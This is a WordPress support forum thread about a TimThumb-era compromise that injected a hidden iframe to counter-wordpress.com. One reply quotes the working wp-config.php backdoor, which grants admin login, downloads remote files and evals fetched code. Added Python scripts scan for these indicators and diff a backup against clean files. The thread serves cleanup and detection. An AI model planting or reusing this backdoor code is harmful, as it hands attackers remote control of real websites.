Title: [TimThumb Vulnerability] iframe hack
Last modified: August 20, 2016

---

# [TimThumb Vulnerability] iframe hack

 *  [x1code](https://wordpress.org/support/users/secretja/)
 * (@secretja)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/)
 * Hi,
 * does somebody have more info about
 *     ```
       <iframe id="iframe" style="width: 1px; height: 1px;" src=" http://counter-wordpress.com/frame.php">
       <html>
       <head>
       </head>
       <body>
       </body>
       </html>
       </iframe>
       ```
   
 * Somebody hacked all my WP sites…
 * THX to all who will help.

Viewing 15 replies - 1 through 15 (of 59 total)


 *  [milescatlett](https://wordpress.org/support/users/milescatlett/)
 * (@milescatlett)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249248)
 * I am hosted on Bluehost.com. I was speaking to a customer service rep today.
   He said he noticed this appearing in an iframe on a non-WordPress site. I have
   this on some of my sites also. I would appreciate any information anyone has.
 * Thanks
 * Miles
 *  Thread Starter [x1code](https://wordpress.org/support/users/secretja/)
 * (@secretja)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249254)
 * I have re-uploaded all WP sites and now all is OK. On one non-WP site I noticed
   the same thing, but I did the same as with the WP sites.
 * Good luck Miles.
 *  [ToucanCreative](https://wordpress.org/support/users/toucancreative/)
 * (@toucancreative)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249260)
 * I just got this exact iframe hack on my WordPress site. I have scoured many, many
   files and run antivirus/malware checks on the whole site without any success. I
   am hosted with VentraIP.com.au. This seems like a new hack given OP posted 2
   hours ago. I noticed this just yesterday.
 *  [Spirit_of_Martin](https://wordpress.org/support/users/spirit_of_martin/)
 * (@spirit_of_martin)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249304)
 * Look in config.php
 * delete code:
 *     ```
       if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
       if ($_GET['pass'] == ''){
       if ($_GET['pingnow']== 'login'){
       $user_login = 'admin';
       $user = get_userdatabylogin($user_login);
       $user_id = $user->ID;
       wp_set_current_user($user_id, $user_login);
       wp_set_auth_cookie($user_id);
       do_action('wp_login', $user_login);
       }
       if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
       $ch = curl_init($_GET['file']);
       $fnm = md5(rand(0,100)).'.php';
       $fp = fopen($fnm, "w");
       curl_setopt($ch, CURLOPT_FILE, $fp);
       curl_setopt($ch, CURLOPT_HEADER, 0);
       curl_setopt($ch, CURLOPT_TIMEOUT, 5);
       curl_exec($ch);
       curl_close($ch);
       fclose($fp);
       echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
       }
       if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
       $ch = curl_init($_GET['file']);
       curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
       curl_setopt($ch, CURLOPT_HEADER, 0);
       curl_setopt($ch, CURLOPT_TIMEOUT, 5);
       $re = curl_exec($ch);
       curl_close($ch);
       eval($re);
       }}}
       ```
   
 * There’s something somewhere else, still looking. I don’t know how they hacked the site…
 * Regards!
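The snippet above is a good source of detection patterns for anyone cleaning up after this: the `$_GET['pingnow']` switch, `curl_init()` on attacker-supplied input, `eval()` of a downloaded variable, and the 1px iframe pointing at counter-wordpress.com from the first post. The following scanner is an added example written for this thread (not WordPress code and not any poster's code); it walks a site tree and flags files containing those patterns. The regexes and the sample files it builds are this example's own construction.

```python
"""Indicator scan for the backdoor and injected iframe described in this thread.

Added example (not WordPress code and not any poster's code): it walks a site
tree and flags files that contain the patterns seen in the posts above: the
$_GET['pingnow'] backdoor, curl_init() on attacker-supplied input, eval() of a
variable, and a 1px iframe pointing at counter-wordpress.com. The regexes and
the sample files are this example's own construction.
"""
import re
import tempfile
from pathlib import Path

INDICATORS = {
    "pingnow_backdoor": re.compile(r"\$_GET\s*\[\s*['\"]pingnow['\"]\s*\]"),
    "curl_from_get": re.compile(r"curl_init\s*\(\s*\$_GET\b"),
    "remote_eval": re.compile(r"\beval\s*\(\s*\$\w+\s*\)"),
    "counter_wordpress_iframe": re.compile(r"<iframe[^>]*counter-wordpress\.com", re.I),
    "hidden_iframe": re.compile(r"<iframe[^>]*(?:width|height)\s*:\s*1px", re.I),
}
SCAN_SUFFIXES = {".php", ".js", ".html", ".htm"}


def wants_scan(path: Path) -> bool:
    """Scan PHP, JS and HTML plus .htaccess (which has no suffix for pathlib)."""
    return path.name == ".htaccess" or path.suffix.lower() in SCAN_SUFFIXES


def scan_file(path: Path) -> set:
    """Return the names of every indicator that matches somewhere in the file."""
    text = path.read_text(encoding="utf-8", errors="replace")
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def scan_tree(root: Path) -> dict:
    """Map each flagged file (POSIX path relative to root) to its sorted indicators."""
    hits = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and wants_scan(path):
            found = scan_file(path)
            if found:
                hits[path.relative_to(root).as_posix()] = sorted(found)
    return hits


# Constructed sample tree: a trimmed copy of the posted wp-config.php backdoor,
# an l10n.js carrying the posted iframe, and an untouched index.php.
BACKDOOR_EXCERPT = """<?php
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$re = curl_exec($ch);
eval($re);
}}
"""
INJECTED_JS = ('var x = \'<iframe id="iframe" style="width: 1px; height: 1px;"'
               ' src=" http://counter-wordpress.com/frame.php"></iframe>\';')
CLEAN_PHP = "<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n"


def demo_scan() -> dict:
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-includes" / "js").mkdir(parents=True)
        (root / "wp-config.php").write_text(BACKDOOR_EXCERPT)
        (root / "wp-includes" / "js" / "l10n.js").write_text(INJECTED_JS)
        (root / "index.php").write_text(CLEAN_PHP)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, names in demo_scan().items():
        print(f"{rel}: {', '.join(names)}")
```

On a real install, replace `demo_scan()` with `scan_tree(Path("/path/to/backup"))`; the `remote_eval` and `hidden_iframe` patterns are deliberately broad, so expect to review each hit rather than delete on sight.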
 *  [ToucanCreative](https://wordpress.org/support/users/toucancreative/)
 * (@toucancreative)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249305)
 * I also re-uploaded my WP files, and everything seems to be in order again – for
   now at least!
 *  [baluba](https://wordpress.org/support/users/baluba/)
 * (@baluba)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249311)
 * Interesting, seeing the same iframe code in some of my Joomla sites too.
 *  [milescatlett](https://wordpress.org/support/users/milescatlett/)
 * (@milescatlett)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249319)
 * I’m not sure what it does, but I have had sites that have been redirecting to
   other locations (sometimes sleazy, music playing, etc…).
 * But I have also been upgrading TimThumb, so those things could be related to that.
 * [@secretja](https://wordpress.org/support/users/secretja/), what do you mean
   by reupload? Are you installing a fresh theme, or exporting the content of an
   old site and creating a new WordPress site? I’m afraid to download the whole
   database for fear it might have malicious code in it…
 * Thanks for all your help….
 *  Thread Starter [x1code](https://wordpress.org/support/users/secretja/)
 * (@secretja)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249320)
 * Hi,
 * it is not in the theme files… it is somewhere else. I downloaded a fresh WP and
   uploaded/upgraded all WP sites. Now it is OK.
 *  [Elmo_is_evil](https://wordpress.org/support/users/elmo_is_evil/)
 * (@elmo_is_evil)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249324)
 * Got this as well after being affected by PHPRemoteView via TimThumb ….
 * Now PHPRemoteView is gone and TimThumb is up to date, but after removing it yesterday
   (in my case a JS), it came back this morning …
 * Mine was embedded in a JS, \wp-includes\js\l10n.js yesterday, and this morning
   \wp-includes\js\l10n.js and \wp-includes\js\jquery\jquery.js …. The code is obfuscated….
 * I already mentioned it on a PHPRemoteView topic ….
 * [http://wordpress.org/support/topic/two-strange-errors?replies=22#post-2289404](http://wordpress.org/support/topic/two-strange-errors?replies=22#post-2289404)
 *  Moderator [Ipstenu (Mika Epstein)](https://wordpress.org/support/users/ipstenu/)
 * (@ipstenu)
 * 🏳️‍🌈 Advisor and Activist
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249331)
 * Once you’ve removed TimThumb, you STILL need to perform the usual steps.
 * 1) Change ALL YOUR PASSWORDS
 * 2) Scan ALL your files (esp. .htaccess) for anything hinky.
 * Best would be to delete and re-upload everything fresh, and then change every
   single password, from WP to FTP and SQL.
 *  [Elmo_is_evil](https://wordpress.org/support/users/elmo_is_evil/)
 * (@elmo_is_evil)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249334)
 * Damn, sometimes I’m a tool, I just forgot to upload the clean wp-config.php ….
 * Anyway, still looking to be sure ….
 * Spirit_of_Martin, my PHP is a little bit rusty, but basically this bit of PHP
   gave the attacker the cookie of the admin in the first condition; the second
   looks like some kind of scanner/patcher, and the third a file downloader ….
 * My guess is that there’s a tool on top of it (On another server or computer) ….
 *  [Devin Walker](https://wordpress.org/support/users/dlocc/)
 * (@dlocc)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249346)
 * The same thing happened to us today on our site. We’ve been getting hit with 
   attacks all seemingly coming from the timthumb vulnerability. We have updated
   timthumb but this keeps happening. I’m guessing there’s a missing back door somewhere.
 * What’s really concerning to me is that my site’s database password has been commented
   out and changed. I’m wondering if there’s anything wrong with my database now…
 *  Thread Starter [x1code](https://wordpress.org/support/users/secretja/)
 * (@secretja)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249353)
 * I got it again. Damn.
 *  Moderator [Ipstenu (Mika Epstein)](https://wordpress.org/support/users/ipstenu/)
 * (@ipstenu)
 * 🏳️‍🌈 Advisor and Activist
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249356)
 * Then you’re not cleaning it up right.
 * Best way at this point would be to do this:
 * 1) Backup EVERYTHING to your PC. Files and DB.
 * 2) DELETE the files on your server. Yeah. Don’t worry, your posts are in your
   database, we’re leaving that alone.
 * 3) Change your passwords for SSH/FTP and SQL.
 * 4) On your PC, review the following files: .htaccess, wp-config.php
 * They look okay? Good. Copy them back up to your server (remember to edit your
   wp-config.php with your new SQL password).
 * 5) Get FRESH and CLEAN downloads of WordPress, all your themes and plugins.
 * 6) As soon as you get in, change your passwords.
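Step 4 (review what you backed up) is the part people get wrong, as the earlier replies show. The script below is an added example for that step, not WordPress code and not a poster's code: it hashes every file in the backup and in a fresh download of the same WordPress version, then reports what was modified, what exists only in the backup (where a dropped file like the random-named `.php` the posted backdoor writes would show up), what is missing, and which files (`wp-config.php`, `.htaccess`) have no clean counterpart and must be read by hand. The two trees it builds are constructed; in real use `site_root` is your backup and `clean_root` is the unpacked fresh download.

```python
"""Compare a backup of the hacked site against a fresh WordPress download.

Added example (not WordPress code and not a poster's code) for the cleanup
steps above: after backing everything up and before re-uploading, hash every
file in the backup and in a clean download of the same WordPress version and
report what was modified, what exists only in the backup, what is missing, and
which files the thread says to review by hand. Both trees below are constructed;
in real use site_root is the backup and clean_root is the unpacked download.
"""
import hashlib
import tempfile
from pathlib import Path

# Present on a live site but absent from a fresh download; review manually.
REVIEW_BY_HAND = {"wp-config.php", ".htaccess"}


def sha256_file(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def hash_tree(root: Path) -> dict:
    """Map each file (POSIX path relative to root) to its SHA-256."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in root.rglob("*") if p.is_file()}


def compare_trees(site_root: Path, clean_root: Path) -> dict:
    """Bucket every path from either tree into modified/added/missing/review."""
    site, clean = hash_tree(site_root), hash_tree(clean_root)
    report = {"modified": [], "added": [], "missing": [], "review_by_hand": []}
    for rel in sorted(set(site) | set(clean)):
        if rel in site and rel in REVIEW_BY_HAND:
            report["review_by_hand"].append(rel)
        elif rel not in clean:
            report["added"].append(rel)
        elif rel not in site:
            report["missing"].append(rel)
        elif site[rel] != clean[rel]:
            report["modified"].append(rel)
    return report


def write_tree(root: Path, files: dict) -> None:
    for rel, content in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)


# Constructed trees. CLEAN stands in for an unpacked fresh download; SITE for
# the backup of the infected install.
CLEAN = {
    "index.php": "<?php require __DIR__ . '/wp-blog-header.php';\n",
    "readme.html": "<html>readme</html>\n",
    "wp-includes/js/l10n.js": "// clean l10n\n",
}
SITE = {
    "index.php": CLEAN["index.php"],
    "wp-includes/js/l10n.js": CLEAN["wp-includes/js/l10n.js"] + "/* appended */\n",
    "wp-config.php": "<?php define('DB_NAME', 'example');\n",
    ".htaccess": "RewriteEngine On\n",
    # constructed dropped-file name in the md5(...).php shape the posted code uses
    "wp-content/uploads/0cc175b9c0f1b6a831c399e269772661.php": "<?php\n",
}


def demo_compare() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        site_root, clean_root = Path(tmp) / "site", Path(tmp) / "clean"
        write_tree(site_root, SITE)
        write_tree(clean_root, CLEAN)
        return compare_trees(site_root, clean_root)


if __name__ == "__main__":
    for bucket, files in demo_compare().items():
        print(bucket, files)
```

Anything in `modified` inside `wp-includes` or `wp-admin` is a core file that should never differ from the download; `added` needs a look at every `.php` under `wp-content/uploads`, since nothing should execute from there; and `review_by_hand` is exactly the pair of files the steps above tell you to read before copying back.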
 *  [milescatlett](https://wordpress.org/support/users/milescatlett/)
 * (@milescatlett)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249371)
 * This may be a dumb question, but I can see counter-wordpress loading on my site.
   However, when I right click on the page to view source or try to view it in firebug,
   I can’t find an iframe or “counter” in the source code. Where is it, so I can
   know if it’s gone?


The topic ‘[TimThumb Vulnerability] iframe hack’ is closed to new replies.

## Tags

 * [iframe hack](https://wordpress.org/support/topic-tag/iframe-hack/)

 * In: [Everything else WordPress](https://wordpress.org/support/forum/miscellaneous/)
 * 59 replies
 * 22 participants
 * Last reply from: [Ipstenu (Mika Epstein)](https://wordpress.org/support/users/ipstenu/)
 * Last activity: [14 years, 5 months ago](https://wordpress.org/support/topic/iframe-hack-3/page/4/#post-2249501)
 * Status: not resolved

